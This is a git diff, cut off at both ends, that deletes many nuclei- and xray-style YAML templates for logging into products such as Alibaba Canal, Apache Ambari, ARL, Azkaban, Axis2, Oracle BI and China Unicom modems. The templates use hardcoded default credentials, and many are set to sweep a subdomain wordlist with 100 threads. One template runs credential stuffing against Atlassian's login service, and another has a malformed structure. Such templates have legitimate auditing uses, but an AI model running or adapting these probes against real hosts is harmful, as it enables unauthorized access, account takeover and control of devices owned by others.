@@ -1,25 +0,0 @@
-name: poc-yaml-alibaba-canal-default-password
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: POST
- path: /api/v1/user/login
- expression: response.status == 200 && response.body.bcontains(b"com.alibaba.otter.canal.admin.controller.UserController.login")
- r1:
- request:
- cache: true
- method: POST
- path: /api/v1/user/login
- headers:
- Content-Type: application/json
- body: '{"username":"admin","password":"123456"}'
- follow_redirects: false
- expression: response.status == 200 && response.body.bcontains(b"{\"code\":20000,") && response.body.bcontains(b"\"data\":{\"token\"")
-expression: r0() && r1()
-detail:
- author: jweny(https://github.com/jweny)
- links:
- - https://www.cnblogs.com/xiexiandong/p/12888582.html
diff --git a/tmp/default/alibaba-canal-default-password.yaml b/tmp/default/alibaba-canal-default-password.yaml
deleted file mode 100644
index b2633e3bcc..0000000000
--- a/tmp/default/alibaba-canal-default-password.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-id: alibaba-canal-default-password
-
-info:
- name: Alibaba Canal Default Password
- author: pdteam
- severity: high
- tags: alibaba,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /api/v1/user/login HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/json
-
- {"username":"admin","password":"123456"}
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - 'data":{"token"'
- - '"code":20000'
- condition: and
diff --git a/tmp/default/alphaweb-default-login-276.yaml b/tmp/default/alphaweb-default-login-276.yaml
deleted file mode 100644
index 086e1caf38..0000000000
--- a/tmp/default/alphaweb-default-login-276.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: alphaweb-default-login
-info:
- name: AlphaWeb XE Default Login
- author: Lark Lab
- severity: medium
- tags: default-login
- reference: https://wiki.zenitel.com/wiki/AlphaWeb
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /php/node_info.php HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Authorization: Basic {{base64('admin' + ':' + 'alphaadmin')}}
- Referer: {{Scheme}}://{{Subdomains}}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "HW Configuration"
- - "SW Configuration"
- condition: and
- - type: status
- status:
- - 200
diff --git a/tmp/default/alphaweb-default-login.yaml b/tmp/default/alphaweb-default-login.yaml
deleted file mode 100644
index 0ed0786d79..0000000000
--- a/tmp/default/alphaweb-default-login.yaml
+++ /dev/null
@@ -1,34 +0,0 @@
-id: alphaweb-default-login
-
-info:
- name: AlphaWeb XE Default Login
- author: Lark Lab
- severity: medium
- tags: default-login
- reference: https://wiki.zenitel.com/wiki/AlphaWeb
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- GET /php/node_info.php HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Authorization: Basic {{base64('admin' + ':' + 'alphaadmin')}}
- Referer: {{Scheme}}://{{Subdomains}}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "HW Configuration"
- - "SW Configuration"
- condition: and
-
- - type: status
- status:
- - 200
\ No newline at end of file
diff --git a/tmp/default/ambari-default-credentials-286.yaml b/tmp/default/ambari-default-credentials-286.yaml
deleted file mode 100644
index ce212aae7f..0000000000
--- a/tmp/default/ambari-default-credentials-286.yaml
+++ /dev/null
@@ -1,22 +0,0 @@
-id: ambari-default-credentials
-info:
- name: Apache Ambari Default Credentials
- author: pdteam
- severity: medium
- tags: ambari,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1
- Host: {{Subdomains}}
- Authorization: Basic YWRtaW46YWRtaW4=
- matchers:
- - type: word
- words:
- - '"Users" : {'
- - 'AMBARI.'
- condition: and
diff --git a/tmp/default/ambari-default-credentials.yaml b/tmp/default/ambari-default-credentials.yaml
deleted file mode 100644
index 5db840b593..0000000000
--- a/tmp/default/ambari-default-credentials.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: ambari-default-credentials
-
-info:
- name: Apache Ambari Default Credentials
- author: pdteam
- severity: medium
- tags: ambari,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1
- Host: {{Subdomains}}
- Authorization: Basic YWRtaW46YWRtaW4=
- matchers:
- - type: word
- words:
- - '"Users" : {'
- - 'AMBARI.'
- condition: and
\ No newline at end of file
diff --git a/tmp/default/ambari-default-login-288.yaml b/tmp/default/ambari-default-login-288.yaml
deleted file mode 100644
index a4e07e62d6..0000000000
--- a/tmp/default/ambari-default-login-288.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: ambari-default-login
-info:
- name: Apache Ambari Default Login
- author: pdteam
- severity: medium
- tags: ambari,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Authorization: Basic YWRtaW46YWRtaW4=
- matchers-condition: and
- matchers:
- - type: word
- words:
- - '"Users" : {'
- - 'AMBARI.'
- condition: and
diff --git a/tmp/default/ambari-default-login.yaml b/tmp/default/ambari-default-login.yaml
deleted file mode 100644
index 82711ba366..0000000000
--- a/tmp/default/ambari-default-login.yaml
+++ /dev/null
@@ -1,28 +0,0 @@
-id: ambari-default-login
-
-info:
- name: Apache Ambari Default Login
- author: pdteam
- severity: medium
- tags: ambari,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Authorization: Basic YWRtaW46YWRtaW4=
- matchers-condition: and
- matchers:
- - type: word
- words:
- - '"Users" : {'
- - 'AMBARI.'
- condition: and
\ No newline at end of file
diff --git a/tmp/default/ambari-default-password.yaml b/tmp/default/ambari-default-password.yaml
deleted file mode 100644
index de885351f9..0000000000
--- a/tmp/default/ambari-default-password.yaml
+++ /dev/null
@@ -1,18 +0,0 @@
-id: ambari-default-password
-
-info:
- name: Apache Ambari Default Password
- author: wulalalaaa(https://github.com/wulalalaaa)
- severity: high
- verified: true
- description: fofa app="APACHE-Ambari" admin/admin
-
-rules:
- r0:
- request:
- method: GET
- path: /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name
- headers:
- Authorization: Basic YWRtaW46YWRtaW4=
- expression: response.status == 200 && response.body.bcontains(b"PrivilegeInfo") && response.body.bcontains(b"AMBARI.ADMINISTRATOR")
-expression: r0()
diff --git a/tmp/default/aolynk-br304-default-password.yaml b/tmp/default/aolynk-br304-default-password.yaml
deleted file mode 100644
index db47b55ae4..0000000000
--- a/tmp/default/aolynk-br304-default-password.yaml
+++ /dev/null
@@ -1,19 +0,0 @@
-id: aolynk-br304-default-password
-
-info:
- name: 华为Aolynk BR304+ 智能安全路由器默认口令
- author: zan8in
- severity: high
- verified: true
- description: |
- fofa: Aolynk BR304
-
-rules:
- r0:
- request:
- method: GET
- path: /index_main.html
- headers:
- Authorization: Basic YWRtaW46YWRtaW4=
- expression: response.status == 200 && response.body.bcontains(b'/menu_admin.html')
-expression: r0()
\ No newline at end of file
diff --git a/tmp/default/apache-ambari-default-password.yaml b/tmp/default/apache-ambari-default-password.yaml
deleted file mode 100644
index 3406893131..0000000000
--- a/tmp/default/apache-ambari-default-password.yaml
+++ /dev/null
@@ -1,17 +0,0 @@
-name: poc-yaml-apache-ambari-default-password
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: GET
- path: /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name
- headers:
- Authorization: Basic YWRtaW46YWRtaW4=
- expression: response.status == 200 && response.body.bcontains(b"PrivilegeInfo") && response.body.bcontains(b"AMBARI.ADMINISTRATOR")
-expression: r0()
-detail:
- author: wulalalaaa(https://github.com/wulalalaaa)
- links:
- - https://cwiki.apache.org/confluence/display/AMBARI/Quick+Start+Guide
diff --git a/tmp/default/arl-default-login-538.yaml b/tmp/default/arl-default-login-538.yaml
deleted file mode 100644
index 6f5b1823f1..0000000000
--- a/tmp/default/arl-default-login-538.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-id: arl-default-login
-info:
- name: ARL Default Login
- author: pikpikcu
- severity: high
- tags: arl,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /api/user/login HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Content-Type: application/json; charset=UTF-8
-
- {"username":"admin","password":"arlpass"}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - '"message": "success"'
- - '"username": "admin"'
- - '"type": "login"'
- condition: and
- - type: status
- status:
- - 200
diff --git a/tmp/default/arl-default-login.yaml b/tmp/default/arl-default-login.yaml
deleted file mode 100644
index bf0e29bfa0..0000000000
--- a/tmp/default/arl-default-login.yaml
+++ /dev/null
@@ -1,34 +0,0 @@
-id: arl-default-login
-
-info:
- name: ARL Default Login
- author: pikpikcu
- severity: high
- tags: arl,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /api/user/login HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Content-Type: application/json; charset=UTF-8
-
- {"username":"admin","password":"arlpass"}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - '"message": "success"'
- - '"username": "admin"'
- - '"type": "login"'
- condition: and
- - type: status
- status:
- - 200
diff --git a/tmp/default/arl-default-password-542.yaml b/tmp/default/arl-default-password-542.yaml
deleted file mode 100644
index 703ec63b64..0000000000
--- a/tmp/default/arl-default-password-542.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: arl-default-password
-info:
- name: ARL Default Password
- author: pikpikcu
- severity: high
- tags: arl,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /api/user/login HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/json; charset=UTF-8
-
- {"username":"admin","password":"arlpass"}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - '"message": "success"'
- - '"username": "admin"'
- - '"type": "login"'
- condition: and
- - type: status
- status:
- - 200
diff --git a/tmp/default/arl-default-password.yaml b/tmp/default/arl-default-password.yaml
deleted file mode 100644
index 07f9fc9a69..0000000000
--- a/tmp/default/arl-default-password.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: arl-default-password
-
-info:
- name: ARL Default Password
- author: pikpikcu
- severity: high
- tags: arl,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /api/user/login HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/json; charset=UTF-8
-
- {"username":"admin","password":"arlpass"}
- matchers-condition: and
- matchers:
-
- - type: word
- words:
- - '"message": "success"'
- - '"username": "admin"'
- - '"type": "login"'
- condition: and
- - type: status
- status:
- - 200
diff --git a/tmp/default/aruba-instant-default-login.yaml b/tmp/default/aruba-instant-default-login.yaml
deleted file mode 100755
index 8da349c17b..0000000000
--- a/tmp/default/aruba-instant-default-login.yaml
+++ /dev/null
@@ -1,41 +0,0 @@
-id: aruba-instant-default-login
-
-info:
- name: Aruba Instant - Default Login
- author: SleepingBag945
- severity: high
- description: |
- Aruba Instant is an AP device. The device has a default password, and attackers can control the entire platform through the default password admin/admin vulnerability, and use administrator privileges to operate core functions.
- reference:
- - https://www.192-168-1-1-ip.co/aruba-networks/routers/179/#:~:text=The%20default%20username%20for%20your,control%20panel%20of%20your%20router.
- metadata:
- verified: true
- max-request: 1
- fofa-query: body="jscripts/third_party/raphael-treemap.min.js" || body="jscripts/third_party/highcharts.src.js"
- tags: aruba,default-login
-
-http:
- - raw:
- - |
- POST /swarm.cgi HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
-
- opcode=login&user={{username}}&passwd={{password}}&refresh=false&nocache=0.17699820340903838
-
- attack: pitchfork
- payloads:
- username:
- - admin
- password:
- - admin
- host-redirects: true
- cookie-reuse: true
- matchers:
- - type: dsl
- dsl:
- - 'status_code_1 == 200'
- - 'contains(body_1,"name=\"sid") && contains(body_1,"true\">Admin")'
- condition: and
-
-# digest: 4b0a004830460221008db0d66a3387df059f84c9af5adf592d9f1d1ef472c1f0457384b2d110b06cd7022100d20882cff79925a0b5b81863248f4d47d9c4bcc66266b607664aa4c5bfa7927a:922c64590222798bb761d5b6d8e72950
diff --git a/tmp/default/atlassian-login-default.yaml b/tmp/default/atlassian-login-default.yaml
deleted file mode 100644
index 93f5b50d7f..0000000000
--- a/tmp/default/atlassian-login-default.yaml
+++ /dev/null
@@ -1,40 +0,0 @@
-id: atlassian-login-default
-
-info:
- name: Atlassian Login Check
- author: parthmalhotra,pdresearch
- severity: critical
- description: Checks for a valid atlassian account.
- reference:
- - https://owasp.org/www-community/attacks/Credential_stuffing
- tags: login-check,atlassian,creds-stuffing
-
-self-contained: true
-http:
- - raw:
- - |
- POST https://auth.atlassian.com/co/authenticate HTTP/1.1
- Host: auth.atlassian.com
- Content-Type: application/json
- Origin: https://id.atlassian.com
- Referer: https://id.atlassian.com/
-
- {"username":"{{username}}","password":"{{password}}","state":{"csrfToken":"{{rand_text_alpha(10, "")}}"}}
-
- extractors:
- - type: dsl
- dsl:
- - username
- - password
-
- attack: pitchfork
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - '"error_description":"Wrong email or password."'
-
- - type: status
- status:
- - 403
diff --git a/tmp/default/axis2-default-password.yaml b/tmp/default/axis2-default-password.yaml
deleted file mode 100644
index 100f059e61..0000000000
--- a/tmp/default/axis2-default-password.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-id: axis2-default-password
-
-info:
- name: Axis2 Default Login
- author: pikpikcu
- severity: high
- verified: true
-
-rules:
- r0:
- request:
- method: POST
- path: /axis2-admin/login
- body: loginUsername=admin&loginPassword=axis2
- expression: response.status == 200 && response.body.bcontains(b'Welcome to Axis2 Web Admin Module !!
')
- stop_if_match: true
- r1:
- request:
- method: POST
- path: /axis2/axis2-admin/login
- body: userName=admin&password=axis2&submit=+Login+
- expression: response.status == 200 && response.body.bcontains(b'Welcome to Axis2 Web Admin Module !!
')
-expression: r0() || r1()
\ No newline at end of file
diff --git a/tmp/default/azkaban-default-login-672.yaml b/tmp/default/azkaban-default-login-672.yaml
deleted file mode 100644
index 5239585fb0..0000000000
--- a/tmp/default/azkaban-default-login-672.yaml
+++ /dev/null
@@ -1,41 +0,0 @@
-id: azkaban-default-login
-info:
- name: Azkaban Web Client Default Credential
- author: pussycat0x
- severity: high
- reference: https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22
- tags: default-login,azkaban
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST / HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
- action=login&username=admin&password=admin
- matchers-condition: and
- matchers:
- - type: word
- words:
- - '"session.id"'
- - '"success"'
- condition: and
- - type: word
- words:
- - 'azkaban.browser.session.id'
- - 'application/json'
- condition: and
- part: header
- - type: status
- status:
- - 200
- extractors:
- - type: kval
- kval:
- - azkaban.browser.session.id
diff --git a/tmp/default/azkaban-default-login.yaml b/tmp/default/azkaban-default-login.yaml
deleted file mode 100644
index bbfc817399..0000000000
--- a/tmp/default/azkaban-default-login.yaml
+++ /dev/null
@@ -1,44 +0,0 @@
-id: azkaban-default-login
-
-info:
- name: Azkaban Web Client Default Credential
- author: pussycat0x
- severity: high
- reference: https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22
- tags: default-login,azkaban
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST / HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
- action=login&username=admin&password=admin
- matchers-condition: and
- matchers:
- - type: word
- words:
- - '"session.id"'
- - '"success"'
- condition: and
- - type: word
- words:
- - 'azkaban.browser.session.id'
- - 'application/json'
- condition: and
- part: header
- - type: status
- status:
- - 200
- extractors:
- - type: kval
- kval:
- - azkaban.browser.session.id
diff --git a/tmp/default/azkaban-default-password.yaml b/tmp/default/azkaban-default-password.yaml
deleted file mode 100644
index 07c2712f44..0000000000
--- a/tmp/default/azkaban-default-password.yaml
+++ /dev/null
@@ -1,16 +0,0 @@
-id: azkaban-default-password
-
-info:
- name: Azkaban Web Client Default Credential
- author: pussycat0x
- severity: high
- verified: true
-
-rules:
- r0:
- request:
- method: POST
- path: /
- body: action=login&username=admin&password=admin
- expression: response.status == 200 && response.body.bcontains(b'"session.id"') && response.body.bcontains(b'"success"') && response.raw_header.bcontains(b'application/json') && response.raw_header.bcontains(b'azkaban.browser.session.id')
-expression: r0()
\ No newline at end of file
diff --git a/tmp/default/azure-default-page.yaml b/tmp/default/azure-default-page.yaml
deleted file mode 100644
index c852064c1a..0000000000
--- a/tmp/default/azure-default-page.yaml
+++ /dev/null
@@ -1,34 +0,0 @@
-info:
- id: azure-default-page
- name: Microsoft Azure Default Page
- author: OpenAI
- description: Template to detect the default page of Microsoft Azure.
- severity: Low
- classification:
- country: any
- tags:
- - azure
- - default-page
- - cloud
-
- matcher-condition: or
-
- requests:
- method: GET
- path:
- - "/"
- - "/index.html"
- description: Attempt to access the default page of Microsoft Azure
- condition: and
-
- matchers:
- - pattern: "Azure Management Portal"
- type: body
- description: Microsoft Azure default page found in the response body
- - pattern: "Microsoft Azure App Service - Welcome"
- type: body
- description: Microsoft Azure default page found in the response body
-
- response:
- - status:
- - 200
diff --git a/tmp/default/bithighway-default-password.yaml b/tmp/default/bithighway-default-password.yaml
deleted file mode 100644
index 90ec768150..0000000000
--- a/tmp/default/bithighway-default-password.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: bithighway-default-password
-
-info:
- name: 碧海威 L7 弱口令漏洞
- author: jijue
- severity: high
- verified: true
- description: |
- 碧海威 L7 存在两个默认登陆口令,配合该产品的命令执行漏洞实现更深层次的利用
- fofa: 碧海威
-
-rules:
- r0:
- request:
- method: POST
- path: /login.php?action=login&type=admin
- body: username=admin&password=admin
- expression: response.status == 200 && response.body.bcontains(b'"success":"true"') && response.body.bcontains(b'"data":')
- r1:
- request:
- method: POST
- path: /login.php?action=login&type=admin
- body: username=admin&password=admin123
- expression: response.status == 200 && response.body.bcontains(b'"success":"true"') && response.body.bcontains(b'"data":')
-expression: r0() || r1()
\ No newline at end of file
diff --git a/tmp/default/businessintelligence-default-login-815.yaml b/tmp/default/businessintelligence-default-login-815.yaml
deleted file mode 100644
index ca3908e8f8..0000000000
--- a/tmp/default/businessintelligence-default-login-815.yaml
+++ /dev/null
@@ -1,38 +0,0 @@
-id: oracle-business-intelligence-login
-info:
- name: Oracle Business Intelligence Default Login
- author: milo2012
- severity: high
- tags: oracle,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /xmlpserver/services/XMLPService HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: text/xml
- SOAPAction: ""
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-
-
-
-
-
- Administrator
- Administrator
- bi
-
-
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - 'createSessionReturn'
- part: body
diff --git a/tmp/default/businessintelligence-default-login.yaml b/tmp/default/businessintelligence-default-login.yaml
deleted file mode 100644
index 74997f8699..0000000000
--- a/tmp/default/businessintelligence-default-login.yaml
+++ /dev/null
@@ -1,42 +0,0 @@
-id: oracle-business-intelligence-login
-
-info:
- name: Oracle Business Intelligence Default Login
- author: milo2012
- severity: high
- tags: oracle,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /xmlpserver/services/XMLPService HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: text/xml
- SOAPAction: ""
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-
-
-
-
-
- Administrator
- Administrator
- bi
-
-
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
-
- - type: word
- words:
- - 'createSessionReturn'
- part: body
diff --git a/tmp/default/canal-default-login-847.yaml b/tmp/default/canal-default-login-847.yaml
deleted file mode 100644
index 7de54ef95d..0000000000
--- a/tmp/default/canal-default-login-847.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: canal-default-login
-info:
- name: Alibaba Canal Default Login
- author: pdteam
- severity: high
- tags: alibaba,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /api/v1/user/login HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Content-Type: application/json
-
- {"username":"admin","password":"123456"}
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - 'data":{"token"'
- - '"code":20000'
- condition: and
diff --git a/tmp/default/canal-default-login.yaml b/tmp/default/canal-default-login.yaml
deleted file mode 100644
index 91d030dd32..0000000000
--- a/tmp/default/canal-default-login.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: canal-default-login
-
-info:
- name: Alibaba Canal Default Login
- author: pdteam
- severity: high
- tags: alibaba,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /api/v1/user/login HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Content-Type: application/json
-
- {"username":"admin","password":"123456"}
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - 'data":{"token"'
- - '"code":20000'
- condition: and
diff --git a/tmp/default/change-default-port.yaml b/tmp/default/change-default-port.yaml
deleted file mode 100644
index 43129ce8c0..0000000000
--- a/tmp/default/change-default-port.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-id: change-default-port
-
-info:
- name: Change SSH Default Port
- author: pussycat0x
- severity: info
- description: |
- Reduces Automated Attacks: Changing the default port can help avoid most automated attacks that target port 22.
- remediation: |
- Ensure the following line is present: : Port 2222
- reference:
- - https://vishalraj82.medium.com/hardening-openssh-security-37f5d634015f
- - https://gcore.com/learning/how-to-change-ssh-port/
- tags: audit,config,file,ssh
-
-file:
- - extensions:
- - all
-
- matchers:
- - type: word
- words:
- - "#Port 22"
\ No newline at end of file
diff --git a/tmp/default/chinaunicom-default-login-907.yaml b/tmp/default/chinaunicom-default-login-907.yaml
deleted file mode 100644
index 4b738bd834..0000000000
--- a/tmp/default/chinaunicom-default-login-907.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: chinaunicom-default-login
-info:
- name: Chinaunicom Modem Default Login
- author: princechaddha
- severity: high
- tags: chinaunicom,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /cu.html HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Content-Type: application/json
-
- frashnum=&action=login&Frm_Logintoken=1&Username=CUAdmin&Password=CUAdmin&Username=&Password=
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 302
- - type: word
- words:
- - "/menu.gch"
- part: header
diff --git a/tmp/default/chinaunicom-default-login.yaml b/tmp/default/chinaunicom-default-login.yaml
deleted file mode 100644
index 6811956080..0000000000
--- a/tmp/default/chinaunicom-default-login.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: chinaunicom-default-login
-
-info:
- name: Chinaunicom Modem Default Login
- author: princechaddha
- severity: high
- tags: chinaunicom,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /cu.html HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Content-Type: application/json
-
- frashnum=&action=login&Frm_Logintoken=1&Username=CUAdmin&Password=CUAdmin&Username=&Password=
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 302
- - type: word
- words:
- - "/menu.gch"
- part: header
diff --git a/tmp/default/chinaunicom-modem-default-credentials-911.yaml b/tmp/default/chinaunicom-modem-default-credentials-911.yaml
deleted file mode 100644
index 16a3e6021d..0000000000
--- a/tmp/default/chinaunicom-modem-default-credentials-911.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: chinaunicom-modem-default-credentials
-info:
- name: Chinaunicom Modem Default Credentials
- author: princechaddha
- severity: high
- tags: chinaunicom,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /cu.html HTTP/1.1
- Host: {{Subdomains}}
-
- frashnum=&action=login&Frm_Logintoken=1&Username=CUAdmin&Password=CUAdmin&Username=&Password=
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 302
- - type: word
- words:
- - "/menu.gch"
- part: header
diff --git a/tmp/default/chinaunicom-modem-default-credentials.yaml b/tmp/default/chinaunicom-modem-default-credentials.yaml
deleted file mode 100644
index ecc0ba40f0..0000000000
--- a/tmp/default/chinaunicom-modem-default-credentials.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: chinaunicom-modem-default-credentials
-
-info:
- name: Chinaunicom Modem Default Credentials
- author: princechaddha
- severity: high
- tags: chinaunicom,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /cu.html HTTP/1.1
- Host: {{Subdomains}}
-
- frashnum=&action=login&Frm_Logintoken=1&Username=CUAdmin&Password=CUAdmin&Username=&Password=
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 302
- - type: word
- words:
- - "/menu.gch"
- part: header
diff --git a/tmp/default/chinaunicom-modem-default-password.yaml b/tmp/default/chinaunicom-modem-default-password.yaml
deleted file mode 100644
index 66b1674277..0000000000
--- a/tmp/default/chinaunicom-modem-default-password.yaml
+++ /dev/null
@@ -1,18 +0,0 @@
-id: chinaunicom-modem-default-password
-
-info:
- name: 中国联通 modem 默认密码
- author: daffainfo
- severity: high
- verified: false
- description: 中国联通 modem 默认密码
-
-rules:
- r0:
- request:
- method: POST
- path: /cu.html
- body: frashnum=&action=login&Frm_Logintoken=1&Username=CUAdmin&Password=CUAdmin&Username=&Password=
- expression: response.status == 302 && response.headers["location"] == "/menu.gch"
-expression: r0()
-
diff --git a/tmp/default/chinaunicom-modem-default-password.yml b/tmp/default/chinaunicom-modem-default-password.yml
deleted file mode 100644
index bb903126b2..0000000000
--- a/tmp/default/chinaunicom-modem-default-password.yml
+++ /dev/null
@@ -1,14 +0,0 @@
-name: poc-yaml-chinaunicom-modem-default-password
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: POST
- path: /cu.html
